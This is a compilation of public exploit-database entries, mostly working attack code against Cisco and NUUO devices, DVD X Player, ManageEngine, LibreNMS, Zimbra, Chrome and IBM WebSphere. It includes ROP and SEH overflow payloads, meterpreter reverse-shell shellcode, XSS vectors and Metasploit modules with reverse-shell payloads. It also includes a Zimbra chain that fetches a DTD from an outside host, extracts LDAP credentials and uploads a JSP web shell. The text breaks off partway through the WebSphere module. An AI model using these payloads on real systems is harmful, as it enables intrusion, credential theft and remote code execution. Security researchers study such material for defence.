-
Cisco RV130W 1.0.3.44 - Remote Stack Overflow
#!/usr/bin/python # Exploit Title: Cisco RV130W Remote Stack Overflow # Google Dork: n/a # Date: Advisory Published: Feb 2019 # Exploit Author: @0x00string # Vendor Homepage: cisco.com # Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html # Version: 1.0.3.44 and prior # Tested on: 1.0.3.44 # CVE : CVE-2019-1663 # # 0x357fc000 - libc base addr # 0x35849144 - system() addr # # 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr; # 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc}; # 0x00041308 / 0x3583D308: mov r0, sp; blx r2; # # gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text # [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command] # # curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi' #!/usr/bin/python import requests def banner(): print ''' @0x00string 0000000000000 0000000000000000000 00 00000000000000000000000000000 0000000000000000000000000000000 000000000 0000000000 00000000 0000000000 0000000 000000000000 0000000 000000000000000 000000 000000000 000000 0000000 000000000 000000 000000 000000000 000000 000000 000000000 000000 000000 00000000 000000 000000 000000000 000000 0000000 000000000 0000000 000000 000000000 
000000 0000000000000000 0000000 0000000000000 0000000 00000000000 00000000 00000000000 000000000 0000000000000000000000000000000 00000000000000000000000000000 000 0000000000000000000 0000000000000 https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py ''' def main(): banner() command = "ping 192.168.1.100\x00" print ("Sending exploit to execute [" + command + "]\n") rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35" payload = ("Z" * 446) + rop + command url = "https://192.168.1.100:443/login.cgi" data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'} r = requests.post(url, payload=data) if __name__ == "__main__": main()
-
NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow
#!/usr/bin/python # Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow # Google Dork: n/a # Date: Advisory Published: Nov 18 # Exploit Author: @0x00string # Vendor Homepage: nuuo.com # Software Link: https://www.nuuo.com/ProductNode.php?node=2 # Version: 3.9.1 and prior # Tested on: 3.9.1 # CVE : CVE-2018-19864 # # [ leading / ] # [ Padding x 335 ] # [ original value at stack pointer + 158 ] # [ padding x 80 ] # [ address of (pop {r3,lr} ; bx lr) ] # [ system() address ] # [ address of (mov r0,sp ; blx r3) ] # [ command to execute ] def banner(): print ''' @0x00string 0000000000000 0000000000000000000 00 00000000000000000000000000000 0000000000000000000000000000000 000000000 0000000000 00000000 0000000000 0000000 000000000000 0000000 000000000000000 000000 000000000 000000 0000000 000000000 000000 000000 000000000 000000 000000 000000000 000000 000000 00000000 000000 000000 000000000 000000 0000000 000000000 0000000 000000 000000000 000000 0000000000000000 0000000 0000000000000 0000000 00000000000 00000000 00000000000 000000000 0000000000000000000000000000000 00000000000000000000000000000 000 0000000000000000000 0000000000000 https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py ''' def usage (): print ("python script.py <args>\n" " -h, --help: Show this message\n" " -a, --rhost: Target IP address\n" " -b, --rport: Target Port - default 5150\n" " -c, --command: Command to execute\n" "\n" "Example:\n" "python script.py -a 10.10.10.10\n" "python script.py -a 10.10.10.10 -b 1234 -c reboot\n") exit() def main(): rhost = None; rport = "5150"; command = "{/bin/touch,/tmp/hax}" banner() options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help']) for opt, arg in options: if opt in ('-h', '--help'): usage() elif opt in ('-a','--rhost'): rhost = arg; elif opt in ('-b','--rport'): rport = arg; elif opt in ('-c','--command'): command = arg; print ("Sending exploit to execute [" + command + "]\n") buf = "GET /" + ("Z" 
* 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" + "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " + "http://" + rhost + ":" + rport + "\r\n\r\n" sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(30) sock.connect((target_ip,int(target_port))) sock.send(buf) print ("done\n") if __name__ == "__main__": main()
-
DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)
# Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH # Date: 6-3-2019 # Exploit Author: Kevin Randall # Vendor Homepage: http://www.dvd-x-player.com/download.html#dvdPlayer # Software Link: http://www.dvd-x-player.com/download.html#dvdPlayer # Version: 5.5 Pro # Tested on: Windows 7 # CVE : N/A #!/usr/bin/python ###########Create Shellcode with MSFVenom############################################################################################### ##msfvenom shellcode generate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 -b '\x00\x0A\x0D\x1A' -f python ######################################################################################################################################## file_name = "payloadofficial.plf" #######################Copy and Paste Shellcode Here!!########################### buf = "" buf += "\xd9\xe8\xb8\xa0\x7e\x18\xef\xd9\x74\x24\xf4\x5f\x2b" buf += "\xc9\xb1\x56\x31\x47\x18\x83\xef\xfc\x03\x47\xb4\x9c" buf += "\xed\x13\x5c\xe2\x0e\xec\x9c\x83\x87\x09\xad\x83\xfc" buf += "\x5a\x9d\x33\x76\x0e\x11\xbf\xda\xbb\xa2\xcd\xf2\xcc" buf += "\x03\x7b\x25\xe2\x94\xd0\x15\x65\x16\x2b\x4a\x45\x27" buf += "\xe4\x9f\x84\x60\x19\x6d\xd4\x39\x55\xc0\xc9\x4e\x23" buf += "\xd9\x62\x1c\xa5\x59\x96\xd4\xc4\x48\x09\x6f\x9f\x4a" buf += "\xab\xbc\xab\xc2\xb3\xa1\x96\x9d\x48\x11\x6c\x1c\x99" buf += "\x68\x8d\xb3\xe4\x45\x7c\xcd\x21\x61\x9f\xb8\x5b\x92" buf += "\x22\xbb\x9f\xe9\xf8\x4e\x04\x49\x8a\xe9\xe0\x68\x5f" buf += "\x6f\x62\x66\x14\xfb\x2c\x6a\xab\x28\x47\x96\x20\xcf" buf += "\x88\x1f\x72\xf4\x0c\x44\x20\x95\x15\x20\x87\xaa\x46" buf += "\x8b\x78\x0f\x0c\x21\x6c\x22\x4f\x2d\x41\x0f\x70\xad" buf += "\xcd\x18\x03\x9f\x52\xb3\x8b\x93\x1b\x1d\x4b\xa2\x0c" buf += "\x9e\x83\x0c\x5c\x60\x24\x6c\x74\xa7\x70\x3c\xee\x0e" buf += "\xf9\xd7\xee\xaf\x2c\x4d\xe5\x27\x0f\x39\xf9\xbe\xe7" buf += "\x3b\xfa\xd1\xab\xb2\x1c\x81\x03\x94\xb0\x62\xf4\x54" buf += "\x61\x0b\x1e\x5b\x5e\x2b\x21\xb6\xf7\xc6\xce\x6e\xaf" buf += 
"\x7e\x76\x2b\x3b\x1e\x77\xe6\x41\x20\xf3\x02\xb5\xef" buf += "\xf4\x67\xa5\x18\x63\x87\x35\xd9\x06\x87\x5f\xdd\x80" buf += "\xd0\xf7\xdf\xf5\x16\x58\x1f\xd0\x25\x9f\xdf\xa5\x1f" buf += "\xeb\xd6\x33\x1f\x83\x16\xd4\x9f\x53\x41\xbe\x9f\x3b" buf += "\x35\x9a\xcc\x5e\x3a\x37\x61\xf3\xaf\xb8\xd3\xa7\x78" buf += "\xd1\xd9\x9e\x4f\x7e\x22\xf5\xd3\x79\xdc\x8b\xfb\x21" buf += "\xb4\x73\xbc\xd1\x44\x1e\x3c\x82\x2c\xd5\x13\x2d\x9c" buf += "\x16\xbe\x66\xb4\x9d\x2f\xc4\x25\xa1\x65\x88\xfb\xa2" buf += "\x8a\x11\x0c\xd8\xe3\xa6\xed\x1d\xea\xc2\xee\x1d\x12" buf += "\xf5\xd3\xcb\x2b\x83\x12\xc8\x0f\x9c\x21\x6d\x39\x37" buf += "\x49\x21\x39\x12" ################################################################################# #No Operations# nops = "\x90"*20 shellcode = nops + buf ####Where all the magic happens! :)##################################################################### buffer = "A"* 608 + "\xEB\x06\x90\x90" + "\x2E\x17\x64\x61" + shellcode + "D"*(1384-len(shellcode)) ################################################################################################### plf_file = open(file_name,"w") plf_file.write(buffer) plf_file.close()
-
Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12538 Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME= PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view
-
Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12541 Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter. Attack vector: domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=Solutions PoC: https://drive.google.com/file/d/1zXyFpVwAPc0MfcERNmvIdyKLzx0JMA9r/view
-
Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12542 An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter. Attack vector: domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol"><img src%3da onerror%3dalert('XSS')>qzmm3u7id8z&selectName=Site PoC: https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view
-
Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12543 Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter. Attack vector: domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl PoC: https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view
-
LibreNMS - addhost Command Injection (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'LibreNMS addhost Command Injection', 'Description' => %q( This module exploits a command injection vulnerability in the open source network management software known as LibreNMS. The community parameter used in a POST request to the addhost functionality is unsanitized. This parameter is later used as part of a shell command that gets passed to the popen function in capture.inc.php, which can result in execution of arbitrary code. This module requires authentication to LibreNMS first. ), 'License' => MSF_LICENSE, 'Author' => [ 'mhaskar', # Vulnerability discovery and PoC 'Shelby Pace' # Metasploit module ], 'References' => [ [ 'CVE', '2018-20434' ], [ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ], [ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ] ], 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Linux', { 'Platform' => 'unix', 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' } } ] ], 'DisclosureDate' => '2018-12-16', 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]), OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]), OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ]) ]) end def login login_uri = normalize_uri(target_uri.path, 'login') res = send_request_cgi('method' => 'GET', 'uri' => login_uri) fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200 cookies = res.get_cookies login_res = send_request_cgi( 'method' => 'POST', 'uri' => login_uri, 'cookie' => cookies, 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } ) 
fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302 cookies = login_res.get_cookies res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'cookie' => cookies) fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices') print_status('Successfully logged into LibreNMS. Storing credentials...') store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) login_res.get_cookies end def add_device(cookies) add_uri = normalize_uri(target_uri.path, 'addhost') @hostname = Rex::Text.rand_text_alpha(6...12) comm_payload = "'; #{payload.encoded}#'" res = send_request_cgi( 'method' => 'POST', 'uri' => add_uri, 'cookie' => cookies, 'vars_post' => { 'snmp' => 'on', 'force_add' => 'on', 'snmpver' => 'v2c', 'hostname' => @hostname, 'community' => comm_payload, 'authalgo' => 'MD5', 'cryptoalgo' => 'AES', 'transport' => 'udp', 'port_assoc_mode' => 'ifIndex' } ) fail_with(Failure::NotFound, 'Failed to add device') unless res && res.body.include?('Device added') print_good("Successfully added device with hostname #{@hostname}") host_id = res.get_html_document.search('div[@class="alert alert-success"]/a[@href]').text fail_with(Failure::NotFound, "Couldn't retrieve the id for the device") if host_id.empty? host_id = host_id.match(/(\d+)/).nil? ? nil : host_id.match(/(\d+)/) fail_with(Failure::NotFound, 'Failed to retrieve a valid device id') if host_id.nil? host_id end def del_device(id, cookies) del_uri = normalize_uri(target_uri.path, 'delhost') res = send_request_cgi( 'method' => 'POST', 'uri' => del_uri, 'cookie' => cookies, 'vars_post' => { 'id' => id, 'confirm' => 1 } ) print_status('Unsure if device was deleted. 
No response received') unless res if res.body.include?("Removed device #{@hostname.downcase}") print_good("Successfully deleted device with hostname #{@hostname} and id ##{id}") else print_status('Failed to delete device. Manual deletion may be needed') end end def exploit exp_uri = normalize_uri(target_uri.path, 'ajax_output.php') cookies = login host_id = add_device(cookies) send_request_cgi( 'method' => 'GET', 'uri' => exp_uri, 'cookie' => cookies, 'vars_get' => { 'id' => 'capture', 'format' => 'text', 'type' => 'snmpwalk', 'hostname' => @hostname } ) del_device(host_id, cookies) end end
-
Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery
#coding=utf8 import requests import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) base_url=sys.argv[1] base_url=base_url.rstrip("/") #upload file name and content #modify by k8gege #Connect "shell.jsp" using K8fly CmdShell #Because the CMD parameter is encrypted using Base64(bypass WAF) filename = "shell.jsp" fileContent = r'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>' print(base_url) #dtd file url dtd_url="https://k8gege.github.io/zimbra.dtd" """ <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start "<![CDATA["> <!ENTITY % end "]]>"> <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>"> """ xxe_data = r"""<!DOCTYPE Autodiscover [ <!ENTITY % dtd SYSTEM "{dtd}"> %dtd; %all; ]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema> </Request> </Autodiscover>""".format(dtd=dtd_url) #XXE stage headers = { "Content-Type":"application/xml" } print("[*] Get User Name/Password By XXE ") r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15) #print r.text if 'response schema not available' not in r.text: print("have no 
xxe") exit() #low_token Stage import re pattern_name = re.compile(r"<key name=(\"|")zimbra_user(\"|")>\n.*?<value>(.*?)<\/value>") pattern_password = re.compile(r"<key name=(\"|")zimbra_ldap_password(\"|")>\n.*?<value>(.*?)<\/value>") username = pattern_name.findall(r.text)[0][2] password = pattern_password.findall(r.text)[0][2] print(username) print(password) auth_body="""<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> <soap:Header> <context xmlns="urn:zimbra"> <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/> </context> </soap:Header> <soap:Body> <AuthRequest xmlns="{xmlns}"> <account by="adminName">{username}</account> <password>{password}</password> </AuthRequest> </soap:Body> </soap:Envelope> """ print("[*] Get Low Privilege Auth Token") r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False) pattern_auth_token=re.compile(r"<authToken>(.*?)</authToken>") low_priv_token = pattern_auth_token.findall(r.text)[0] #print(low_priv_token) # SSRF+Get Admin_Token Stage headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";" headers["Host"]="foo:7071" print("[*] Get Admin Auth Token By SSRF") r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password),headers=headers,verify=False) admin_token =pattern_auth_token.findall(r.text)[0] #print("ADMIN_TOKEN:"+admin_token) f = { 'filename1':(None,"whocare",None), 'clientFile':(filename,fileContent,"text/plain"), 'requestId':(None,"12",None), } headers ={ "Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";" } print("[*] Uploading file") r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False) #print(r.text) print("Shell: "+base_url+"/downloads/"+filename) #print("Connect \"shell.jsp\" using K8fly CmdShell\nBecause the CMD parameter 
is encrypted using Base64(bypass WAF)") print("[*] Request Result:") s = requests.session() r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers) #print(r.text) print("May need cookie:") print(headers['Cookie'])
-
Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free
<!-- VULNERABILITY DETAILS https://cs.chromium.org/chromium/src/v8/src/wasm/wasm-objects.cc?rcl=783343158eb1b147df7e6669f1d03c690c878e21&l=1253 ``` int32_t WasmMemoryObject::Grow(Isolate* isolate, Handle<WasmMemoryObject> memory_object, uint32_t pages) { [...] Handle<JSArrayBuffer> new_buffer; if (old_buffer->is_shared()) { // Adjust protections for the buffer. if (!AdjustBufferPermissions(isolate, old_buffer, new_size)) { return -1; } void* backing_store = old_buffer->backing_store(); if (memory_tracker->IsWasmSharedMemory(backing_store)) { // This memory is shared between different isolates. DCHECK(old_buffer->is_shared()); // Update pending grow state, and trigger a grow interrupt on all the // isolates that share this buffer. memory_tracker->SetPendingUpdateOnGrow(old_buffer, new_size); // Handle interrupts for this isolate so that the instances with this // isolate are updated. isolate->stack_guard()->HandleInterrupts(); // Failure to allocate, or adjust pemissions already handled here, and // updates to instances handled in the interrupt handler safe to return. return static_cast<uint32_t>(old_size / wasm::kWasmPageSize); } // SharedArrayBuffer, but not shared across isolates. Setup a new buffer // with updated permissions and update the instances. new_buffer = wasm::SetupArrayBuffer(isolate, backing_store, new_size, // ***1*** old_buffer->is_external(), SharedFlag::kShared); memory_object->update_instances(isolate, new_buffer); [...] ``` When `Grow` is called on a `WebAssembly.Memory` object that's backed by a `SharedArrayBuffer`, it uses the buffer's backing store pointer to construct a new array buffer[1]. Calling `Detach` on shared buffers is prohibited by the spec, so the method just leaves the old one as it is. Thus two array buffers might end up owning the same backing store, and if one of them got garbage collected, the other one would point to a freed memory region. 
Blink's SharedArrayBuffer implementation uses reference-counted backing stores, so v8 should probably implement something similar. VERSION Google Chrome 73.0.3683.103 (Official Build) (64-bit) (cohort: Stable) Chromium 75.0.3758.0 (Developer Build) (64-bit) This bug affects the stable branch due to the currently active "WebAssembly Threads" Origin Trial. https://developers.chrome.com/origintrials/#/view_trial/-5026017184145473535 REPRODUCTION CASE --> <script> function gc() { for (let i = 0; i < 50; ++i) { let buffer = new ArrayBuffer(1024 * 1024); } } setInterval(() => { memory = new WebAssembly.Memory({initial: 1, maximum: 2, shared: true}); memory.grow(1); gc(); array = new Int8Array(memory.buffer); array[0x1337] = 1; }); </script> <!-- CREDIT INFORMATION Sergei Glazunov of Google Project Zero -->
-
IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Powershell include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution', 'Description' => %( This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells. NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset. ), 'License' => MSF_LICENSE, 'Author' => [ 'b0yd' # @rwincey of [Securifera](https://www.securifera.com/) / Vulnerability Discovery and MSF module author ], 'References' => [ ['CVE', '2019-8352'], ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628'] ], 'Platform' => ['win'], 'Targets' => [ [ 'Windows Binary', { 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win' } ], [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'win', 'Payload' => {'Compat' => {'RequiredCmd' => 'generic'}} } ] ], 'Privileged' => true, 'DefaultTarget' => 0, 'DisclosureDate' => 'May 15 2019')) register_options( [ Opt::RPORT(11006), # 11002,11004,11006,etc OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]), OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']), OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']), OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL']) ] ) end def cleanup disconnect print_status('Disconnected from IBM Websphere DMGR.') super end def exploit command = nil if target.name == 'CMD' fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD'] command = datastore['CMD'] end # Connect to IBM Websphere Application Server connect 
print_status("Connected to IBM WAS DMGR.") node_port = datastore['RPORT'] # Send packet to add neighbor enc_stream = construct_tcp_node_msg(node_port) send_msg(enc_stream) sock.get_once print_status('Server responded') # Generate binary name bin_name = rand_text_alpha(8) if command command = datastore['CMD'] payload_contents = command.to_s print_status('Executing command: ' + payload_contents) bin_name << ".bat" else payload_contents = generate_payload_exe(code: payload.generate) bin_name << ".exe" end print_status("Sending payload: #{bin_name}") enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name) send_msg(enc_stream) register_file_for_cleanup(bin_name) end def send_msg(enc_stream) pkt = [0x396fb74a].pack('N') pkt += [enc_stream.length + 1].pack('N') pkt += "\x00" pkt += enc_stream # Send msg sock.put(pkt) end def construct_tcp_node_msg(node_port) p2p_obj = Rex::Java::Serialization::Model::NewObject.new p2p_obj.class_desc = Rex::Java::Serialization::Model::ClassDesc.new p2p_obj.class_desc.description = build_p2p_node_class(p2p_obj) # Create the obj object = Rex::Java::Serialization::Model::NewObject.new object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj) # Create the stream and add the object stream = Rex::Java::Serialization::Model::Stream.new stream.contents = [] stream.contents << object stream.contents << Rex::Java::Serialization::Model::EndBlockData.new stream.contents << Rex::Java::Serialization::Model::NullReference.new stream.encode end def construct_bcast_task_msg(node_port, filename, byte_str, cmd) # Add upload file argument byte_arr = byte_str.unpack("C*") upfile_arg_obj = build_upfile_arg_class(filename, byte_arr, cmd) # Create the obj object = Rex::Java::Serialization::Model::NewObject.new object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new object.class_desc.description = 
build_bcast_run_task_msg(object, 41, "0.0.0.0", node_port, upfile_arg_obj) # Create the stream and add the object stream = Rex::Java::Serialization::Model::Stream.new stream.contents = [] stream.contents << object stream.encode end def build_message(obj, msg_id, msg_type, orig_cell_field_type) # Create the integer field and add the reference id_field = Rex::Java::Serialization::Model::Field.new id_field.type = 'int' id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ID') # Create the integer field and add the reference type_field = Rex::Java::Serialization::Model::Field.new type_field.type = 'int' type_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'type') # Create the object field and add the reference new_field = Rex::Java::Serialization::Model::Field.new new_field.type = 'object' new_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'originatingCell') new_field.field_type = orig_cell_field_type # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.Message') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << id_field msg_class_desc.fields << type_field msg_class_desc.fields << new_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new # Set the member values obj.class_data << ['int', msg_id] obj.class_data << ['int', msg_type] obj.class_data << Rex::Java::Serialization::Model::NullReference.new msg_class_desc end def build_bcast_flood_msg(obj, msg_type, source_ip, source_port) prng = Random.new msg_id = 
# NOTE(review): this excerpt starts inside build_bcast_flood_msg (the name comes from its
# caller in build_bcast_run_task_msg below); the method's head is outside this view. What is
# visible is its tail: a random 32-bit message id, a back-reference to wire handle
# BASE_WIRE_HANDLE + 1 handed to build_message as the superclass field type, the NewClassDesc
# for 'com.ibm.son.mesh.BcastFloodMsg' (serialVersionUID 1, flags 2 = SC_SERIALIZABLE) with
# fields sourceMsgID(int), sourceUdpPort(int), sourceIP([B), and the class_data values
# [int msg_id, int source_port, byte[] of the dotted-quad source_ip]. The lines below are
# collapsed onto single physical lines; the original layout was one statement per line.
